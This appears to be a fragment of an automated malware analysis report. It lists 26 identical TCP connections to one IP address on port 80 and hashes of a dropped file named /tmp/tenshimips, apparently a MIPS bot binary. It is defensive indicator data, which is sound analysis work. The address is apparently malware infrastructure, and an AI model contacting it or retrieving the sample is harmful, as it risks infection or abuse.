| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
Files
/tmp/tenshimips
| Algorithm | Value |
|---|---|
| MD5 | 01e9b3351a20632ce2de4a219637711c |
| SHA1 | d46e0281e15a1ef4fec829351c47c0eacaf6ad5c |
| SHA256 | b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2 |
| SHA512 | 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f |